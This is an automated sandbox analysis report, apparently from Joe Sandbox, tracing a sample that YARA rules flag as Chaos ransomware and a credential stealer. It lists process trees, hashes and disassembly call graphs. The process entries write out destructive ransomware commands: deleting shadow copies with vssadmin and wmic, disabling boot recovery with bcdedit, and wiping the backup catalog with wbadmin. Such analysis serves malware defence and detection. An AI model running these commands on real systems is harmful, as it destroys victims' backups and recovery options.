                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000004.00000003.1554405640.000001995E6A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000004.00000003.1554405640.000001995E6A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:08:26:32
                                                          Start date:04/09/2024
                                                          Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                          Imagebase:0x800000
                                                          File size:1'357'824 bytes
                                                          MD5 hash:840EB9E50C131322605C5EA90AE1312F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Chaos_1, Description: Yara detected Chaos Ransomware, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                          • Rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM, Description: Detects executables containing many references to VEEAM. Observed in ransomware, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: unknown
                                                          • Rule: MALWARE_Win_Chaos, Description: Detects Chaos ransomware, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                          Reputation:low
                                                          Has exited:false

                                                          General

                                                          Target ID:6
                                                          Start time:08:26:36
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                          Imagebase:0x7ff73d1d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:08:26:36
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:08:26:37
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                                                          Imagebase:0x7ff73d1d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:08:26:37
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:08:26:38
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\vssadmin.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:vssadmin delete shadows /all /quiet
                                                          Imagebase:0x7ff729250000
                                                          File size:145'920 bytes
                                                          MD5 hash:B58073DB8892B67A672906C9358020EC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:08:26:38
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k swprv
                                                          Imagebase:0x7ff67e6d0000
                                                          File size:55'320 bytes
                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:08:26:40
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wmic shadowcopy delete
                                                          Imagebase:0x7ff7678a0000
                                                          File size:576'000 bytes
                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:15
                                                          Start time:08:26:40
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                                                          Imagebase:0x7ff73d1d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:16
                                                          Start time:08:26:40
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:17
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\bcdedit.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                          Imagebase:0x7ff6e7bd0000
                                                          File size:491'864 bytes
                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:18
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\bcdedit.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:bcdedit /set {default} recoveryenabled no
                                                          Imagebase:0x7ff6e7bd0000
                                                          File size:491'864 bytes
                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:19
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                          Imagebase:0x7ff73d1d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:20
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:21
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\wbadmin.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wbadmin delete catalog -quiet
                                                          Imagebase:0x7ff779420000
                                                          File size:329'728 bytes
                                                          MD5 hash:F2AA55885A2C014DA99F1355F3F71E4A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:22
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\wbengine.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\wbengine.exe"
                                                          Imagebase:0x7ff7a93c0000
                                                          File size:1'585'152 bytes
                                                          MD5 hash:17270A354A66590953C4AAC1CF54E507
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:23
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\vdsldr.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\vdsldr.exe -Embedding
                                                          Imagebase:0x7ff683dc0000
                                                          File size:27'136 bytes
                                                          MD5 hash:472A05A6ADC167E9E5D2328AD98E3067
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:24
                                                          Start time:08:26:41
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\vds.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\vds.exe
                                                          Imagebase:0x7ff7a6780000
                                                          File size:723'968 bytes
                                                          MD5 hash:0781CE7ECCD9F6318BA72CD96B5B8992
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:26
                                                          Start time:08:26:49
                                                          Start date:04/09/2024
                                                          Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                          Imagebase:0x8e0000
                                                          File size:1'357'824 bytes
                                                          MD5 hash:840EB9E50C131322605C5EA90AE1312F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:28
                                                          Start time:08:26:52
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                                                          Imagebase:0x7ff73d1d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:29
                                                          Start time:08:26:53
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:30
                                                          Start time:08:26:53
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                          Imagebase:0x7ff67e6d0000
                                                          File size:55'320 bytes
                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:33
                                                          Start time:08:26:57
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\vssadmin.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:vssadmin delete shadows /all /quiet
                                                          Imagebase:0x7ff729250000
                                                          File size:145'920 bytes
                                                          MD5 hash:B58073DB8892B67A672906C9358020EC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:34
                                                          Start time:08:26:59
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wmic shadowcopy delete
                                                          Imagebase:0x7ff7678a0000
                                                          File size:576'000 bytes
                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:37
                                                          Start time:08:27:03
                                                          Start date:04/09/2024
                                                          Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                          Imagebase:0x6b0000
                                                          File size:1'357'824 bytes
                                                          MD5 hash:840EB9E50C131322605C5EA90AE1312F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:38
                                                          Start time:08:27:09
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                                                          Imagebase:0x7ff73d1d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:39
                                                          Start time:08:27:09
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:40
                                                          Start time:08:27:10
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\bcdedit.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                          Imagebase:0x7ff6e7bd0000
                                                          File size:491'864 bytes
                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:43
                                                          Start time:08:27:12
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\bcdedit.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:bcdedit /set {default} recoveryenabled no
                                                          Imagebase:0x7ff6e7bd0000
                                                          File size:491'864 bytes
                                                          MD5 hash:74F7B84B0A547592CA63A00A8C4AD583
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:44
                                                          Start time:08:27:13
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                          Imagebase:0x7ff73d1d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:45
                                                          Start time:08:27:13
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:46
                                                          Start time:08:27:15
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\wbadmin.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wbadmin delete catalog -quiet
                                                          Imagebase:0x7ff779420000
                                                          File size:329'728 bytes
                                                          MD5 hash:F2AA55885A2C014DA99F1355F3F71E4A
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:47
                                                          Start time:08:27:18
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\notepad.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read_it.txt
                                                          Imagebase:0x7ff702c00000
                                                          File size:201'216 bytes
                                                          MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:49
                                                          Start time:08:27:26
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\notepad.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt
                                                          Imagebase:0x7ff702c00000
                                                          File size:201'216 bytes
                                                          MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:51
                                                          Start time:08:28:32
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\notepad.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\read_it.txt
                                                          Imagebase:0x7ff702c00000
                                                          File size:201'216 bytes
                                                          MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:9.1%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:10%
                                                            Total number of Nodes:1554
                                                            Total number of Limit Nodes:53
                                                            execution_graph 26036 41800 86 API calls Concurrency::cancel_current_task 26072 46900 41 API calls __EH_prolog 26110 5c300 99 API calls 24035 6bc00 24036 6bc0b 24035->24036 24038 6bc34 24036->24038 24039 6bc30 24036->24039 24041 6bf1a 24036->24041 24048 6bc60 DeleteCriticalSection 24038->24048 24049 6bca8 24041->24049 24044 6bf5f InitializeCriticalSectionAndSpinCount 24045 6bf4a 24044->24045 24056 60bcc 24045->24056 24047 6bf76 24047->24036 24048->24039 24050 6bcd4 24049->24050 24054 6bcd8 24049->24054 24051 6bcf8 24050->24051 24050->24054 24063 6bd44 24050->24063 24053 6bd04 GetProcAddress 24051->24053 24051->24054 24055 6bd14 _abort 24053->24055 24054->24044 24054->24045 24055->24054 24057 60bd4 24056->24057 24058 60bd5 IsProcessorFeaturePresent 24056->24058 24057->24047 24060 60c17 24058->24060 24070 60bda SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24060->24070 24062 60cfa 24062->24047 24064 6bd65 LoadLibraryExW 24063->24064 24065 6bd5a 24063->24065 24066 6bd82 GetLastError 24064->24066 24069 6bd9a 24064->24069 24065->24050 24067 6bd8d LoadLibraryExW 24066->24067 24066->24069 24067->24069 24068 6bdb1 FreeLibrary 24068->24065 24069->24065 24069->24068 24070->24062 26092 60d5f 9 API calls 2 library calls 24198 4ca0e 24199 4ca20 _abort 24198->24199 24202 523d4 24199->24202 24205 52396 GetCurrentProcess GetProcessAffinityMask 24202->24205 24206 4ca77 24205->24206 26093 5c20f 78 API calls 26073 50514 FreeLibrary 26074 5a510 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 26112 6b710 21 API calls 26113 69b10 7 API calls ___scrt_uninitialize_crt 26037 73c10 VariantClear 26094 70210 51 API calls 24271 5dd1a 24272 5dde4 24271->24272 24278 5dd3d 24271->24278 24288 5d755 _wcslen _wcsrchr 24272->24288 24298 5e75f 24272->24298 24275 5e3cc 24277 532e6 CompareStringW 24277->24278 24278->24272 24278->24277 24279 5da29 SetWindowTextW 24279->24288 24284 5d831 _abort _wcslen 24286 5d8d1 GetFileAttributesW 24284->24286 24284->24288 24291 5dbf3 GetDlgItem SetWindowTextW SendMessageW 24284->24291 24294 5dc33 SendMessageW 24284->24294 24324 4cda0 51 API calls 2 library calls 24284->24324 24285 5d817 SetFileAttributesW 24285->24284 24285->24286 24286->24288 24290 5d8e3 DeleteFileW 24286->24290 24288->24275 24288->24279 24288->24284 24288->24285 24322 532e6 CompareStringW 24288->24322 24323 5b62d GetCurrentDirectoryW 24288->24323 24325 4b9aa 6 API calls 24288->24325 24326 4b933 FindClose 24288->24326 24327 5c51e 76 API calls 2 library calls 24288->24327 24328 6506e 24288->24328 24341 5c3a4 ExpandEnvironmentStringsW 24288->24341 24290->24288 24292 5d8f4 24290->24292 24291->24284 24293 44a00 _swprintf 51 API calls 24292->24293 24295 5d914 GetFileAttributesW 24293->24295 24294->24288 24295->24292 24296 5d929 MoveFileW 24295->24296 24296->24288 24297 5d941 MoveFileExW 24296->24297 24297->24288 24300 5e769 _abort _wcslen 24298->24300 24299 5e9b7 24299->24288 24300->24299 24301 5e990 24300->24301 24302 5e875 24300->24302 24345 532e6 CompareStringW 24300->24345 24301->24299 24306 5e9ae ShowWindow 24301->24306 24342 4b4a1 24302->24342 24306->24299 24307 5e8a9 ShellExecuteExW 24307->24299 24314 5e8bc 24307->24314 24309 5e8a1 24309->24307 24310 5e8f5 24347 5ec0b 6 API calls 24310->24347 24311 5e94b CloseHandle 24312 5e959 24311->24312 24313 5e964 24311->24313 24348 532e6 CompareStringW 24312->24348 24313->24301 24314->24310 24314->24311 24315 5e8eb ShowWindow 24314->24315 24315->24310 24318 5e90d 24318->24311 24319 5e920 GetExitCodeProcess 24318->24319 24319->24311 24320 5e933 24319->24320 24320->24311 24322->24288 24323->24288 24324->24284 24325->24288 24326->24288 24327->24288 24329 6a4f4 24328->24329 24330 6a501 24329->24330 24331 6a50c 24329->24331 24363 6a64e 24330->24363 24333 6a514 24331->24333 24339 6a51d _abort 24331->24339 24334 6a4ba _free 20 API calls 24333->24334 24337 6a509 24334->24337 24335 6a547 HeapReAlloc 24335->24337 24335->24339 24336 6a522 24370 6a63b 20 API calls _abort 24336->24370 24337->24288 24339->24335 24339->24336 24371 68cac 7 API calls 2 library calls 24339->24371 24341->24288 24349 4b4b3 24342->24349 24345->24302 24346 4cab4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24346->24309 24347->24318 24348->24313 24357 5fe20 24349->24357 24352 4b4d1 24359 4cf12 24352->24359 24353 4b4aa 24353->24307 24353->24346 24355 4b4e5 24355->24353 24356 4b4e9 GetFileAttributesW 24355->24356 24356->24353 24358 4b4c0 GetFileAttributesW 24357->24358 24358->24352 24358->24353 24360 4cf1f _wcslen 24359->24360 24361 4cfc7 GetCurrentDirectoryW 24360->24361 24362 4cf48 _wcslen 24360->24362 24361->24362 24362->24355 24364 6a68c 24363->24364 24369 6a65c _abort 24363->24369 24373 6a63b 20 API calls _abort 24364->24373 24366 6a677 RtlAllocateHeap 24367 6a68a 24366->24367 24366->24369 24367->24337 24369->24364 24369->24366 24372 68cac 7 API calls 2 library calls 24369->24372 24370->24337 24371->24339 24372->24369 24373->24367 26038 41025 29 API calls 26039 72025 21 API calls 2 library calls 26040 5b420 GdipCloneImage GdipAlloc 26097 64a20 5 API calls _ValidateLocalCookies 26041 5d755 107 API calls 4 library calls 26042 5f42f 14 API calls ___delayLoadHelper2@8 26043 42037 142 API calls __EH_prolog 26044 42430 26 API calls std::bad_exception::bad_exception 26045 4a830 80 API calls Concurrency::cancel_current_task 26098 67230 QueryPerformanceFrequency QueryPerformanceCounter 26099 5c232 GetDlgItem EnableWindow ShowWindow SendMessageW 24434 4213d 24435 42150 24434->24435 24436 42148 24434->24436 24438 4214e 24435->24438 24440 5fd0e 24435->24440 24453 42162 27 API calls Concurrency::cancel_current_task 24436->24453 24441 5fd13 ___std_exception_copy 24440->24441 24442 5fd2d 24441->24442 24444 5fd2f 24441->24444 24456 68cac 7 API calls 2 library calls 24441->24456 24442->24438 24445 448de Concurrency::cancel_current_task 24444->24445 24447 5fd39 24444->24447 24454 63190 RaiseException 24445->24454 24457 63190 RaiseException 24447->24457 24448 448fa 24450 44910 24448->24450 24455 4136b 26 API calls Concurrency::cancel_current_task 24448->24455 24450->24438 24451 60670 24453->24438 24454->24448 24455->24450 24456->24441 24457->24451 24465 6cb40 24466 6cb52 24465->24466 24467 6cb49 24465->24467 24469 6ca37 24467->24469 24470 6a365 _abort 38 API calls 24469->24470 24471 6ca44 24470->24471 24489 6cb5e 24471->24489 24473 6ca4c 24498 6c7cb 24473->24498 24476 6a64e __vsnwprintf_l 21 API calls 24477 6ca74 24476->24477 24488 6caa6 24477->24488 24505 6cc00 24477->24505 24480 6a4ba _free 20 API calls 24482 6ca63 24480->24482 24481 6caa1 24515 6a63b 20 API calls _abort 24481->24515 24482->24466 24484 6caea 24484->24488 24516 6c6a1 26 API calls 24484->24516 24485 6cabe 24485->24484 24486 6a4ba _free 20 API calls 24485->24486 24486->24484 24488->24480 24490 6cb6a ___scrt_is_nonwritable_in_current_image 24489->24490 24491 6a365 _abort 38 API calls 24490->24491 24492 6cb74 24491->24492 24496 6cbf8 _abort 24492->24496 24497 6a4ba _free 20 API calls 24492->24497 24517 69f44 38 API calls _abort 24492->24517 24518 6bc41 EnterCriticalSection 24492->24518 24519 6cbef LeaveCriticalSection _abort 24492->24519 24496->24473 24497->24492 24499 65794 __cftof 38 API calls 24498->24499 24500 6c7dd 24499->24500 24501 6c7fe 24500->24501 24502 6c7ec GetOEMCP 24500->24502 24503 6c815 24501->24503 24504 6c803 GetACP 24501->24504 24502->24503 24503->24476 24503->24482 24504->24503 24506 6c7cb 40 API calls 24505->24506 24507 6cc1f 24506->24507 24508 6cc26 24507->24508 24510 6cc70 IsValidCodePage 24507->24510 24514 6cc95 _abort 24507->24514 24509 60bcc _ValidateLocalCookies 5 API calls 24508->24509 24511 6ca99 24509->24511 24510->24508 24512 6cc82 GetCPInfo 24510->24512 24511->24481 24511->24485 24512->24508 24512->24514 24520 6c8a3 GetCPInfo 24514->24520 24515->24488 24516->24488 24518->24492 24519->24492 24521 6c8dd 24520->24521 24529 6c987 24520->24529 24530 6d998 24521->24530 24524 60bcc _ValidateLocalCookies 5 API calls 24526 6ca33 24524->24526 24526->24508 24528 6bb88 __vsnwprintf_l 43 API calls 24528->24529 24529->24524 24531 65794 __cftof 38 API calls 24530->24531 24532 6d9b8 MultiByteToWideChar 24531->24532 24534 6d9f6 24532->24534 24542 6da8e 24532->24542 24536 6a64e __vsnwprintf_l 21 API calls 24534->24536 24539 6da17 _abort __vsnwprintf_l 24534->24539 24535 60bcc _ValidateLocalCookies 5 API calls 24537 6c93e 24535->24537 24536->24539 24544 6bb88 24537->24544 24538 6da88 24549 6bbd3 20 API calls _free 24538->24549 24539->24538 24541 6da5c MultiByteToWideChar 24539->24541 24541->24538 24543 6da78 GetStringTypeW 24541->24543 24542->24535 24543->24538 24545 65794 __cftof 38 API calls 24544->24545 24546 6bb9b 24545->24546 24550 6b96b 24546->24550 24549->24542 24551 6b986 __vsnwprintf_l 24550->24551 24552 6b9ac MultiByteToWideChar 24551->24552 24553 6b9d6 24552->24553 24554 6bb60 24552->24554 24559 6a64e __vsnwprintf_l 21 API calls 24553->24559 24561 6b9f7 __vsnwprintf_l 24553->24561 24555 60bcc _ValidateLocalCookies 5 API calls 24554->24555 24556 6bb73 24555->24556 24556->24528 24557 6ba40 MultiByteToWideChar 24558 6baac 24557->24558 24560 6ba59 24557->24560 24586 6bbd3 20 API calls _free 24558->24586 24559->24561 24577 6bf7c 24560->24577 24561->24557 24561->24558 24565 6ba83 24565->24558 24568 6bf7c __vsnwprintf_l 11 API calls 24565->24568 